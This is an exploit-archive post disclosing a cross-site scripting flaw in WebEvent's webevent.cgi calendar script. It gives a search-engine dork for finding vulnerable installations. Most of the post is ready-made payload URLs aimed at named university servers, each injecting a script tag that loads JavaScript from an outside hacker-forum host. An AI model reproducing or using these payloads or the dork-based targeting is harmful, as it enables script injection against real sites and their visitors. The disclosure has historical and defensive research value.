Home / os / solaris

webevent-xss.txt

Posted on 31 July 2007

# Title : WebEvent(tm) webevent.cgi Cross-Site Scripting Vulnerability # Description : WebEvent(tm) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. # Software : http://www.webevent.com/ # Author : d3hydr8 # Contact : d3hydr8[at]gmail[dot]com # Original Post : http://forum.darkc0de.com/index.php?action=vthread&forum=12&topic=184 # Dork : intext:"Powered by WebEvent (tm)." inurl:"/webevent.cgi" # Greets : mozi, whoami, icqbomber #Proof : http://w4.eku.edu/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E WebEvent 2.61 http://calendar.purdue.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E WebEvent 2.7 http://webcal.usf.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E WebEvent 2.71 http://events.haas.berkeley.edu/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E WebEvent 2.72 http://research.yale.edu/cgi-bin/mcdougal/publish2.72/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E WebEvent 2.72 http://ic-server02.info-commons.uiowa.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E WebEvent 4.03

 

TOP